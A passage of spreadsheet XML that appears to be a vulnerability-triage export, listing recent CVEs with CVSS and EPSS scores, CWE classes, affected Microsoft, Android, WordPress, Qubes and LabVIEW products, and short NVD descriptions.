          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P720" s="5" t="inlineStr"/>
      <c r="Q720" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R720" s="5" t="inlineStr">
        <is>
          <t>Improper limitation of a pathname to a restricted directory ('path traversal') in Windows PowerShell allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S720" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69807</t>
        </is>
      </c>
    </row>
    <row r="721">
      <c r="A721" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B721" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C721" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69826</t>
        </is>
      </c>
      <c r="D721" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E721" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F721" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G721" s="5" t="inlineStr"/>
      <c r="H721" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I721" s="5" t="inlineStr"/>
      <c r="J721" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K7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21" s="5" t="inlineStr"/>
      <c r="M721" s="5" t="inlineStr"/>
      <c r="N721" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O721" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P721" s="5" t="inlineStr"/>
      <c r="Q721" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R721" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S721" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69826</t>
        </is>
      </c>
    </row>
    <row r="722">
      <c r="A722" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B722" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C722" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69847</t>
        </is>
      </c>
      <c r="D722" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E722" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F722" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G722" s="5" t="inlineStr"/>
      <c r="H722" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I722" s="5" t="inlineStr"/>
      <c r="J722" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K7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22" s="5" t="inlineStr"/>
      <c r="M722" s="5" t="inlineStr"/>
      <c r="N722" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O722" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P722" s="5" t="inlineStr"/>
      <c r="Q722" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R722" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows DHCP Server allows an authorized attacker to execute code over an adjacent network.</t>
        </is>
      </c>
      <c r="S722" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69847</t>
        </is>
      </c>
    </row>
    <row r="723">
      <c r="A723" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B723" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C723" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69875</t>
        </is>
      </c>
      <c r="D723" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E723" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F723" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G723" s="5" t="inlineStr"/>
      <c r="H723" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I723" s="5" t="inlineStr"/>
      <c r="J723" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K72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723" s="5" t="inlineStr"/>
      <c r="M723" s="5" t="inlineStr"/>
      <c r="N723" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O723" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P723" s="5" t="inlineStr"/>
      <c r="Q723" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-125</t>
        </is>
      </c>
      <c r="R723" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="S723" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69875</t>
        </is>
      </c>
    </row>
    <row r="724">
      <c r="A724" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B724" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C724" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69876</t>
        </is>
      </c>
      <c r="D724" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E724" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F724" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G724" s="5" t="inlineStr"/>
      <c r="H724" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I724" s="5" t="inlineStr"/>
      <c r="J724" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K724" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L724" s="5" t="inlineStr"/>
      <c r="M724" s="5" t="inlineStr"/>
      <c r="N724" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O724" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P724" s="5" t="inlineStr"/>
      <c r="Q724" s="5" t="inlineStr">
        <is>
          <t>CWE-415, CWE-416</t>
        </is>
      </c>
      <c r="R724" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DHCP Server allows an authorized attacker to execute code over an adjacent network.</t>
        </is>
      </c>
      <c r="S724" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69876</t>
        </is>
      </c>
    </row>
    <row r="725">
      <c r="A725" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B725" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C725" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76139</t>
        </is>
      </c>
      <c r="D725" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E725" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F725" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G725" s="5" t="inlineStr"/>
      <c r="H725" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I725" s="5" t="inlineStr"/>
      <c r="J725" s="5" t="inlineStr"/>
      <c r="K725" s="5" t="inlineStr"/>
      <c r="L725" s="5" t="inlineStr"/>
      <c r="M725" s="5" t="inlineStr"/>
      <c r="N725" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O725" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="P725" s="5" t="inlineStr"/>
      <c r="Q725" s="5" t="inlineStr">
        <is>
          <t>CWE-829</t>
        </is>
      </c>
      <c r="R725" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in acm-operator-bundle. The build process for this component downloads and runs a script from a remote source without verifying its authenticity or integrity. This script gains access to sensitive credentials, such as GitHub access tokens and registry passwords, used in the build environment. A remote attacker could exploit this vulnerability to inject malicious code, leading to unauthorized access to build resources and potential compromise of the resulting operator bundle.</t>
        </is>
      </c>
      <c r="S725" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76139</t>
        </is>
      </c>
    </row>
    <row r="726">
      <c r="A726" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B726" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C726" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83948</t>
        </is>
      </c>
      <c r="D726" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E726" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F726" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G726" s="5" t="inlineStr"/>
      <c r="H726" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I726" s="5" t="inlineStr"/>
      <c r="J726" s="5" t="inlineStr"/>
      <c r="K726" s="5" t="inlineStr">
        <is>
          <t>microsoft:vm_repair</t>
        </is>
      </c>
      <c r="L726" s="5" t="inlineStr"/>
      <c r="M726" s="5" t="inlineStr"/>
      <c r="N726" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O726" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P726" s="5" t="inlineStr"/>
      <c r="Q726" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="R726" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in a command ('command injection') in Microsoft Azure CLI allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S726" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83948</t>
        </is>
      </c>
    </row>
    <row r="727">
      <c r="A727" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B727" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C727" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84934</t>
        </is>
      </c>
      <c r="D727" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E727" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F727" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G727" s="5" t="inlineStr"/>
      <c r="H727" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I727" s="5" t="inlineStr"/>
      <c r="J727" s="5" t="inlineStr"/>
      <c r="K727" s="5" t="inlineStr"/>
      <c r="L727" s="5" t="inlineStr"/>
      <c r="M727" s="5" t="inlineStr"/>
      <c r="N727" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O727" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P727" s="5" t="inlineStr"/>
      <c r="Q727" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R727" s="5" t="inlineStr">
        <is>
          <t>The JCH Optimize WordPress plugin before 6.0.1 does not perform a capability check on one of its authenticated AJAX actions and lets the request choose which internal action runs, allowing any authenticated users such as Subscribers to import arbitrary JCH Optimize WordPress plugin before 6.0.1 settings and store a script that executes in the browser of any visitor or administrator viewing the site.</t>
        </is>
      </c>
      <c r="S727" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84934</t>
        </is>
      </c>
    </row>
    <row r="728">
      <c r="A728" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B728" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C728" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84935</t>
        </is>
      </c>
      <c r="D728" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E728" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F728" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G728" s="5" t="inlineStr"/>
      <c r="H728" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I728" s="5" t="inlineStr"/>
      <c r="J728" s="5" t="inlineStr"/>
      <c r="K728" s="5" t="inlineStr"/>
      <c r="L728" s="5" t="inlineStr"/>
      <c r="M728" s="5" t="inlineStr"/>
      <c r="N728" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O728" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P728" s="5" t="inlineStr"/>
      <c r="Q728" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R728" s="5" t="inlineStr">
        <is>
          <t>The HT Menu  WordPress plugin before 1.2.7 does not perform any capability or object-ownership check when saving navigation menu-item settings, and does not escape those stored settings when the menu is rendered, allowing users with minimal permissions such as Subscribers to store JavaScript that executes in the browser of any visitor, administrators included, who views the affected menu.</t>
        </is>
      </c>
      <c r="S728" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84935</t>
        </is>
      </c>
    </row>
    <row r="729">
      <c r="A729" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B729" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C729" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82636</t>
        </is>
      </c>
      <c r="D729" s="5" t="n">
        <v>7.9</v>
      </c>
      <c r="E729" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F729" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G729" s="5" t="inlineStr"/>
      <c r="H729" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I729" s="5" t="inlineStr"/>
      <c r="J729" s="5" t="inlineStr"/>
      <c r="K729" s="5" t="inlineStr"/>
      <c r="L729" s="5" t="inlineStr"/>
      <c r="M729" s="5" t="inlineStr"/>
      <c r="N729" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O729" s="5" t="inlineStr">
        <is>
          <t>2026-08-30</t>
        </is>
      </c>
      <c r="P729" s="5" t="inlineStr"/>
      <c r="Q729" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R729" s="5" t="inlineStr">
        <is>
          <t>Qubes OS before qubes-core-dom0-linux 4.3.22 allows OS command injection during a qvm-copy-to-vm call from dom0 to an attacker-controlled qube, because the "system" library function is used to process an error message that may have shell metacharacters. This occurs in core-admin-linux/file-copy-vm/qfile-dom0-agent.c.</t>
        </is>
      </c>
      <c r="S729" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82636</t>
        </is>
      </c>
    </row>
    <row r="730">
      <c r="A730" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B730" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C730" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85649</t>
        </is>
      </c>
      <c r="D730" s="5" t="n">
        <v>7.9</v>
      </c>
      <c r="E730" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F730" s="5" t="inlineStr">
        <is>
          <t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t>
        </is>
      </c>
      <c r="G730" s="5" t="inlineStr"/>
      <c r="H730" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I730" s="5" t="inlineStr"/>
      <c r="J730" s="5" t="inlineStr"/>
      <c r="K730" s="5" t="inlineStr"/>
      <c r="L730" s="5" t="inlineStr"/>
      <c r="M730" s="5" t="inlineStr"/>
      <c r="N730" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O730" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P730" s="5" t="inlineStr"/>
      <c r="Q730" s="5" t="inlineStr">
        <is>
          <t>CWE-252, CWE-636</t>
        </is>
      </c>
      <c r="R730" s="5" t="inlineStr">
        <is>
          <t>(Holloway) Chew, Kean Ho's Actualizer v1.2.0 and earlier contains a fail-open password validation vulnerability in the Alpha user and root user password loops of Shell/debian-minbase-install.sh. The installer invokes mkpasswd to generate yescrypt password hashes but does not check the command's return value and unconditionally accepts the result. If mkpasswd fails to generate a yescrypt hash, for example because an incompatible mkpasswd implementation or an environment without yescrypt support is used, the resulting password hash variable can be empty and the build proceeds. The resulting image can therefore contain empty password fields for the root and alpha accounts, potentially permitting passwordless authentication depending on the authentication configuration.</t>
        </is>
      </c>
      <c r="S730" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85649</t>
        </is>
      </c>
    </row>
    <row r="731">
      <c r="A731" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B731" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C731" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0065</t>
        </is>
      </c>
      <c r="D731" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E731" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F731" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G731" s="5" t="inlineStr"/>
      <c r="H731" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I731" s="5" t="inlineStr"/>
      <c r="J731" s="5" t="inlineStr"/>
      <c r="K731" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L731" s="5" t="inlineStr"/>
      <c r="M731" s="5" t="inlineStr"/>
      <c r="N731" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O731" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P731" s="5" t="inlineStr"/>
      <c r="Q731" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="R731"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S731" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0065</t>
        </is>
      </c>
    </row>
    <row r="732">
      <c r="A732" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B732" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C732" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0084</t>
        </is>
      </c>
      <c r="D732" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E732" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F732" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G732" s="5" t="inlineStr"/>
      <c r="H732" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I732" s="5" t="inlineStr"/>
      <c r="J732" s="5" t="inlineStr"/>
      <c r="K732" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L732" s="5" t="inlineStr"/>
      <c r="M732" s="5" t="inlineStr"/>
      <c r="N732" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O732" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P732" s="5" t="inlineStr"/>
      <c r="Q732" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="R732"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S732" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0084</t>
        </is>
      </c>
    </row>
    <row r="733">
      <c r="A733" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B733" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C733" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18444</t>
        </is>
      </c>
      <c r="D733" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E733" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F733" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G733" s="5" t="inlineStr"/>
      <c r="H733" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I733" s="5" t="inlineStr"/>
      <c r="J733" s="5" t="inlineStr"/>
      <c r="K733" s="5" t="inlineStr">
        <is>
          <t>ni:labview</t>
        </is>
      </c>
      <c r="L733" s="5" t="inlineStr"/>
      <c r="M733" s="5" t="inlineStr"/>
      <c r="N733" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O733" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P733" s="5" t="inlineStr"/>
      <c r="Q733" s="5" t="inlineStr">
        <is>
          <t>CWE-195</t>
        </is>
      </c>
      <c r="R733" s="5" t="inlineStr">
        <is>
          <t>There is an integer conversion vulnerability resulting in an out-of-bounds read when loading images recently discovered in NI LabVIEW.  This may result in information disclosure or arbitrary code execution.  Successful exploitation requires an attacker to get a user to open a specially crafted VI file.  This vulnerability affects NI LabVIEW 2026 Q3 and prior versions.</t>
        </is>
      </c>
      <c r="S733" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18444</t>
        </is>
      </c>
    </row>
    <row r="734">
      <c r="A734" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B734" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C734" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18445</t>
        </is>
      </c>
      <c r="D734" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E734" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F734" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G734" s="5" t="inlineStr"/>
      <c r="H734" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I734" s="5" t="inlineStr"/>
      <c r="J734" s="5" t="inlineStr"/>
      <c r="K734" s="5" t="inlineStr">
        <is>
          <t>ni:labview</t>
        </is>
      </c>
      <c r="L734" s="5" t="inlineStr"/>
      <c r="M734" s="5" t="inlineStr"/>
      <c r="N734" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O734" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P734" s="5" t="inlineStr"/>
      <c r="Q734" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R734" s="5" t="inlineStr">
        <is>
          <t>There is an integer overflow vulnerability resulting in an out-of-bounds write recently discovered in NI LabVIEW.  This may result in information disclosure or arbitrary code execution.  Successful exploitation requires an attacker to get a user to open a specially crafted VI file.  This vulnerability affects NI LabVIEW 2026 Q3 and prior versions.</t>
        </is>
      </c>
      <c r="S734" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18445</t>
        </is>
      </c>
    </row>
    <row r="735">
      <c r="A735" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B735" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C735" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28572</t>
        </is>
      </c>
      <c r="D735" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E735" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F735" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G735" s="5" t="inlineStr"/>
      <c r="H735" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I735" s="5" t="inlineStr"/>
      <c r="J735" s="5" t="inlineStr"/>
      <c r="K735" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L735" s="5" t="inlineStr"/>
      <c r="M735" s="5" t="inlineStr"/>
      <c r="N735" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O735" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P735" s="5" t="inlineStr"/>
      <c r="Q735" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="R735" s="5" t="inlineStr">
        <is>
          <t>In onCreate of InstallLaunch.kt, there is a possible misleading UI due to a tapjacking/overlay attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="S735" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28572</t>
        </is>
      </c>
    </row>
    <row r="736">
      <c r="A736" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B736" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C736" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28583</t>
        </is>
      </c>
      <c r="D736" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E736" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F736" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G736" s="5" t="inlineStr"/>
      <c r="H736" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I736" s="5" t="inlineStr"/>
      <c r="J736" s="5" t="inlineStr"/>
      <c r="K736" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L736" s="5" t="inlineStr"/>
      <c r="M736" s="5" t="inlineStr"/>
      <c r="N736" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O736" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P736" s="5" t="inlineStr"/>
      <c r="Q736" s="5" t="inlineStr">
        <is>
          <t>CWE-693, CWE-787</t>
        </is>
      </c>
      <c r="R736"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S736" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28583</t>
        </is>
      </c>
    </row>
    <row r="737">
      <c r="A737" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B737" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C737" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28590</t>
        </is>
      </c>
      <c r="D737" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E737" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F737" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G737" s="5" t="inlineStr"/>
      <c r="H737" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I737" s="5" t="inlineStr"/>
      <c r="J737" s="5" t="inlineStr"/>
      <c r="K737" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L737" s="5" t="inlineStr"/>
      <c r="M737" s="5" t="inlineStr"/>
      <c r="N737" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O737" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P737" s="5" t="inlineStr"/>
      <c r="Q737" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="R737"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S737" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28590</t>
        </is>
      </c>
    </row>
    <row r="738">
      <c r="A738" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B738" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C738" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28593</t>
        </is>
      </c>
      <c r="D738" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E738" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F738" s="5" t="inlineStr">
        <is>
